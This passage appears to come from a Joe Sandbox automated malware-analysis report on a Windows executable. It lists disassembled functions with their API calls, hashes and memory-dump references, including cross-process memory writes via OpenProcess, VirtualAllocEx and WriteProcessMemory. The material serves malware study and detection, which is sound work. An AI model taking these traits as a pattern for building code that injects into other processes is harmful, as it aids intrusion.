            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ErrorLast$_free
            • String ID:
            • API String ID: 3170660625-0
            • Opcode ID: 8cd30b694a40a021f76b956ac818ffc24638a147621dcbb9c85eecc8859d6637
            • Instruction ID: 7af5ae60307cb90c7001e9affbbd697de6dc0cd3495f3066a2be065e5ebc0bc6
            • Opcode Fuzzy Hash: 8cd30b694a40a021f76b956ac818ffc24638a147621dcbb9c85eecc8859d6637
            • Instruction Fuzzy Hash: 4E01F9329056006BD66236356D45E2F376FABF13B272C042BF5A1E3386EA7DCC0171A1
            Function 0100000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
            Download Yara Rule
            APIs
            • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FFFF41,80070057,?,?,?,0100035E), ref: 0100002B
            • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FFFF41,80070057,?,?), ref: 01000046
            • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FFFF41,80070057,?,?), ref: 01000054
            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FFFF41,80070057,?), ref: 01000064
            • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FFFF41,80070057,?,?), ref: 01000070
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: From$Prog$FreeStringTasklstrcmpi
            • String ID:
            • API String ID: 3897988419-0
            • Opcode ID: c1f8fca6c3600ff9c359dbf17877e2d4742e353d2808ef9d07d1740dd8e24c44
            • Instruction ID: f38c43f177e09e33f6b049a02682da3e8c19b5d97350f0e4d46671d60ae7f2c5
            • Opcode Fuzzy Hash: c1f8fca6c3600ff9c359dbf17877e2d4742e353d2808ef9d07d1740dd8e24c44
            • Instruction Fuzzy Hash: FF01A776600205BFFB218F69DD08BAA7EEDEF447A1F144115F985E2248DB76DE408760
            Function 0100E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
            Download Yara Rule
            APIs
            • QueryPerformanceCounter.KERNEL32(?), ref: 0100E997
            • QueryPerformanceFrequency.KERNEL32(?), ref: 0100E9A5
            • Sleep.KERNEL32(00000000), ref: 0100E9AD
            • QueryPerformanceCounter.KERNEL32(?), ref: 0100E9B7
            • Sleep.KERNEL32 ref: 0100E9F3
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: PerformanceQuery$CounterSleep$Frequency
            • String ID:
            • API String ID: 2833360925-0
            • Opcode ID: 18071b511a1e30f1435efa5ad99a706f23d11caeafd55c99633f921b0882aff8
            • Instruction ID: 5bcfe0148528dc5ccd42a818a6eed7d8a443bfd8a557d3c093b6bbd5bec90de0
            • Opcode Fuzzy Hash: 18071b511a1e30f1435efa5ad99a706f23d11caeafd55c99633f921b0882aff8
            • Instruction Fuzzy Hash: 0A016931C01629DBEF51AFE5D949AEDBB78FF09300F000966E582F2284CB399650CBA1
            Function 010010F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
            Download Yara Rule
            APIs
            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01001114
            • GetLastError.KERNEL32(?,00000000,00000000,?,?,01000B9B,?,?,?), ref: 01001120
            • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,01000B9B,?,?,?), ref: 0100112F
            • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,01000B9B,?,?,?), ref: 01001136
            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0100114D
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
            • String ID:
            • API String ID: 842720411-0
            • Opcode ID: ffd414ef93f13467180e58cbffc2d983a877090f11d758f7cbd188461211c5f7
            • Instruction ID: dff0678ae8d749b4c6d56511b122777b89d1dc41d6d652bc6a65c5fd81cb63cf
            • Opcode Fuzzy Hash: ffd414ef93f13467180e58cbffc2d983a877090f11d758f7cbd188461211c5f7
            • Instruction Fuzzy Hash: ED016D75100605BFEB264F68DD49AAA3FAEEF85360B100455F981D3340DA36DC009B60
            Function 01000FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
            Download Yara Rule
            APIs
            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01000FCA
            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01000FD6
            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01000FE5
            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01000FEC
            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 01001002
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: HeapInformationToken$AllocErrorLastProcess
            • String ID:
            • API String ID: 44706859-0
            • Opcode ID: a02c6481b5cc6c7d43982dbf3e0d1cd950d44ee586bd8de04d8e00aa966df389
            • Instruction ID: 6467fbb18472e02d3f4aadae07d1699abb7027454f0d0f7a4955e9466de0fb82
            • Opcode Fuzzy Hash: a02c6481b5cc6c7d43982dbf3e0d1cd950d44ee586bd8de04d8e00aa966df389
            • Instruction Fuzzy Hash: A1F06235200341ABF7224FA8DD4DF563FADEF8A761F104455FAC5D7281CA75D8108B60
            Function 01001014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
            Download Yara Rule
            APIs
            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0100102A
            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 01001036
            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01001045
            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0100104C
            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01001062
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: HeapInformationToken$AllocErrorLastProcess
            • String ID:
            • API String ID: 44706859-0
            • Opcode ID: 178926f92c251d9f58d7116d5523e4adc22d0e5836bc61b1cfbbf5766d6283a2
            • Instruction ID: 8a6c74cbedd781c534720c9de0da801b3a80645c5eeb0d7ef3206330d516f7b9
            • Opcode Fuzzy Hash: 178926f92c251d9f58d7116d5523e4adc22d0e5836bc61b1cfbbf5766d6283a2
            • Instruction Fuzzy Hash: 1EF06235200341ABF7225FA8ED49F563FADEF8A761F100415FAC5E7280CA75D9208B60
            Function 0101030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
            Download Yara Rule
            APIs
            • CloseHandle.KERNEL32(?,?,?,?,0101017D,?,010132FC,?,00000001,00FE2592,?), ref: 01010324
            • CloseHandle.KERNEL32(?,?,?,?,0101017D,?,010132FC,?,00000001,00FE2592,?), ref: 01010331
            • CloseHandle.KERNEL32(?,?,?,?,0101017D,?,010132FC,?,00000001,00FE2592,?), ref: 0101033E
            • CloseHandle.KERNEL32(?,?,?,?,0101017D,?,010132FC,?,00000001,00FE2592,?), ref: 0101034B
            • CloseHandle.KERNEL32(?,?,?,?,0101017D,?,010132FC,?,00000001,00FE2592,?), ref: 01010358
            • CloseHandle.KERNEL32(?,?,?,?,0101017D,?,010132FC,?,00000001,00FE2592,?), ref: 01010365
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CloseHandle
            • String ID:
            • API String ID: 2962429428-0
            • Opcode ID: 0fb0e9d67a976a33192867f201eaefef8615f9685087bf6c584d6f85fe0c49cc
            • Instruction ID: 5f8bea76bf93db8063e8aeb132bd2ac4ce1d74ea8279bce112532019a3c604a6
            • Opcode Fuzzy Hash: 0fb0e9d67a976a33192867f201eaefef8615f9685087bf6c584d6f85fe0c49cc
            • Instruction Fuzzy Hash: 4E019E72800B159FD730AF6AD880413FBF9BF502153158A7EE2D652925C375A995DE80
            Function 00FDD73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • _free.LIBCMT ref: 00FDD752
              • Part of subcall function 00FD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00FDD7D1,00000000,00000000,00000000,00000000,?,00FDD7F8,00000000,00000007,00000000,?,00FDDBF5,00000000), ref: 00FD29DE
              • Part of subcall function 00FD29C8: GetLastError.KERNEL32(00000000,?,00FDD7D1,00000000,00000000,00000000,00000000,?,00FDD7F8,00000000,00000007,00000000,?,00FDDBF5,00000000,00000000), ref: 00FD29F0
            • _free.LIBCMT ref: 00FDD764
            • _free.LIBCMT ref: 00FDD776
            • _free.LIBCMT ref: 00FDD788
            • _free.LIBCMT ref: 00FDD79A
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _free$ErrorFreeHeapLast
            • String ID:
            • API String ID: 776569668-0
            • Opcode ID: b08f2190d91a372dad397d68e4bfb54986a6eb0db9d624cd98f8674d8851f834
            • Instruction ID: db9a9d23c3c46ef513e0bc4941ecff91793af7231f5618440652b17070e8d667
            • Opcode Fuzzy Hash: b08f2190d91a372dad397d68e4bfb54986a6eb0db9d624cd98f8674d8851f834
            • Instruction Fuzzy Hash: 74F044329402046B8775EA58FAC5C1A77EFBB4432079C084BF098D7605C729FC4077A1
            Function 01005C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
            Download Yara Rule
            APIs
            • GetDlgItem.USER32(?,000003E9), ref: 01005C58
            • GetWindowTextW.USER32(00000000,?,00000100), ref: 01005C6F
            • MessageBeep.USER32(00000000), ref: 01005C87
            • KillTimer.USER32(?,0000040A), ref: 01005CA3
            • EndDialog.USER32(?,00000001), ref: 01005CBD
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: BeepDialogItemKillMessageTextTimerWindow
            • String ID:
            • API String ID: 3741023627-0
            • Opcode ID: e5b3c2238cb00d69326bc30849f3eb4c04f676b812ce82f5a228bea54385f039
            • Instruction ID: ba8a48062380d04687f3bbfdd71eb1830a97ab7ad7eb11d202395b9f6b0f2a9d
            • Opcode Fuzzy Hash: e5b3c2238cb00d69326bc30849f3eb4c04f676b812ce82f5a228bea54385f039
            • Instruction Fuzzy Hash: B4014F31500708AFFB325B14DE4EFA67BACBB04B05F04165AA6C2A10D1DBB9A9849F90
            Function 00FD22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
            Download Yara Rule
            APIs
            • _free.LIBCMT ref: 00FD22BE
              • Part of subcall function 00FD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00FDD7D1,00000000,00000000,00000000,00000000,?,00FDD7F8,00000000,00000007,00000000,?,00FDDBF5,00000000), ref: 00FD29DE
              • Part of subcall function 00FD29C8: GetLastError.KERNEL32(00000000,?,00FDD7D1,00000000,00000000,00000000,00000000,?,00FDD7F8,00000000,00000007,00000000,?,00FDDBF5,00000000,00000000), ref: 00FD29F0
            • _free.LIBCMT ref: 00FD22D0
            • _free.LIBCMT ref: 00FD22E3
            • _free.LIBCMT ref: 00FD22F4
            • _free.LIBCMT ref: 00FD2305
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _free$ErrorFreeHeapLast
            • String ID:
            • API String ID: 776569668-0
            • Opcode ID: a84bf2c2b0e493eaa677db09a4846cde3d330fe52048f2a1fc82266a75cfbfd3
            • Instruction ID: 1a9470c10f228ab1ed4621cac699cf567f32ab354d45ae60308769c3d320a426
            • Opcode Fuzzy Hash: a84bf2c2b0e493eaa677db09a4846cde3d330fe52048f2a1fc82266a75cfbfd3
            • Instruction Fuzzy Hash: EFF030B0C001108B9672AF68F81180C3B76B7297617080607F4D0E23ADCB3E0812BBE5
            Function 00FB95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
            Download Yara Rule
            APIs
            • EndPath.GDI32(?), ref: 00FB95D4
            • StrokeAndFillPath.GDI32(?,?,00FF71F7,00000000,?,?,?), ref: 00FB95F0
            • SelectObject.GDI32(?,00000000), ref: 00FB9603
            • DeleteObject.GDI32 ref: 00FB9616
            • StrokePath.GDI32(?), ref: 00FB9631
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Path$ObjectStroke$DeleteFillSelect
            • String ID:
            • API String ID: 2625713937-0
            • Opcode ID: 01ccc0ac56b964bc401c874f6f00b0c5c890b473bd8453d102e4447999e2fba6
            • Instruction ID: 3253fc940e68b7480aac58e6e56a4252c30e5aa8bda9403a65eb8934ac3c1db7
            • Opcode Fuzzy Hash: 01ccc0ac56b964bc401c874f6f00b0c5c890b473bd8453d102e4447999e2fba6
            • Instruction Fuzzy Hash: 64F0F431809244DBD7365F56E90C7A47F65B701332F048215F595B50F8C77A4556EF20
            Function 00FD0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: __freea$_free
            • String ID: a/p$am/pm
            • API String ID: 3432400110-3206640213
            • Opcode ID: 5c853d6cc26975a5e29858720b07a21f02edf5e42eb579a7932528e287fcb313
            • Instruction ID: 7843cc06af4bd3b148ef7b022b53a53b0e7286c6674b014c5a0123e9b4610b0d
            • Opcode Fuzzy Hash: 5c853d6cc26975a5e29858720b07a21f02edf5e42eb579a7932528e287fcb313
            • Instruction Fuzzy Hash: FAD1E032D00206EADB289F68C845BBAB7B7FF05320F2C021BE9059B751D3759D80EB91
            Function 01027B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FC0242: EnterCriticalSection.KERNEL32(0107070C,01071884,?,?,00FB198B,01072518,?,?,?,00FA12F9,00000000), ref: 00FC024D
              • Part of subcall function 00FC0242: LeaveCriticalSection.KERNEL32(0107070C,?,00FB198B,01072518,?,?,?,00FA12F9,00000000), ref: 00FC028A
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
              • Part of subcall function 00FC00A3: __onexit.LIBCMT ref: 00FC00A9
            • __Init_thread_footer.LIBCMT ref: 01027BFB
              • Part of subcall function 00FC01F8: EnterCriticalSection.KERNEL32(0107070C,?,?,00FB8747,01072514), ref: 00FC0202
              • Part of subcall function 00FC01F8: LeaveCriticalSection.KERNEL32(0107070C,?,00FB8747,01072514), ref: 00FC0235
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
            • String ID: 5$G$Variable must be of type 'Object'.
            • API String ID: 535116098-3733170431
            • Opcode ID: 733253a444f5d0981b8a0cce1bb23cc3a314c007911606b97c38cfbba4fdb8b7
            • Instruction ID: a0949f64c9075730f1e7a213f73dd3b1f81710ed61b1897ee58c190b798837c7
            • Opcode Fuzzy Hash: 733253a444f5d0981b8a0cce1bb23cc3a314c007911606b97c38cfbba4fdb8b7
            • Instruction Fuzzy Hash: EB91AB71A00219EFDB15EF58C890DADBBB5FF59300F10809DF886AB292DB71AE41CB51
            Function 01002716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 0100B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,010021D0,?,?,00000034,00000800,?,00000034), ref: 0100B42D
            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 01002760
              • Part of subcall function 0100B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,010021FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0100B3F8
              • Part of subcall function 0100B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0100B355
              • Part of subcall function 0100B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,01002194,00000034,?,?,00001004,00000000,00000000), ref: 0100B365
              • Part of subcall function 0100B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,01002194,00000034,?,?,00001004,00000000,00000000), ref: 0100B37B
            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 010027CD
            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0100281A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
            • String ID: @
            • API String ID: 4150878124-2766056989
            • Opcode ID: 625e52b7f09604e5ab3ba5b1576285b11fd204458007344ea37e656e9c27d493
            • Instruction ID: a9ee0aa1f0259f27722cc2aca4c51384c22f8f9ce91988804ac4f179ca857854
            • Opcode Fuzzy Hash: 625e52b7f09604e5ab3ba5b1576285b11fd204458007344ea37e656e9c27d493
            • Instruction Fuzzy Hash: 88415C76900218AFEB11DFA4CD45AEEBBB8EF19300F108095EA85B7180DB706F45CBA0
            Function 00FD172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
            Download Yara Rule
            APIs
            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\8t1uarSZFV.exe,00000104), ref: 00FD1769
            • _free.LIBCMT ref: 00FD1834
            • _free.LIBCMT ref: 00FD183E
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _free$FileModuleName
            • String ID: C:\Users\user\Desktop\8t1uarSZFV.exe
            • API String ID: 2506810119-4183201048
            • Opcode ID: b27dc62a0a54d999a660af7ae05349ff48da25028fdec7a6db330e997d2efa41
            • Instruction ID: 9fe92195e08f2a3daf49053be7d6e7f41a0d7db8b96bb21af26175a4f12a6d33
            • Opcode Fuzzy Hash: b27dc62a0a54d999a660af7ae05349ff48da25028fdec7a6db330e997d2efa41
            • Instruction Fuzzy Hash: C8318D71E00218BBDB21DB99D885D9EBBBEFB85320B184167F804E7311D6758A41EBA0
            Function 0100C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
            Download Yara Rule
            APIs
            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0100C306
            • DeleteMenu.USER32(?,00000007,00000000), ref: 0100C34C
            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01071990,011E6BB0), ref: 0100C395
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
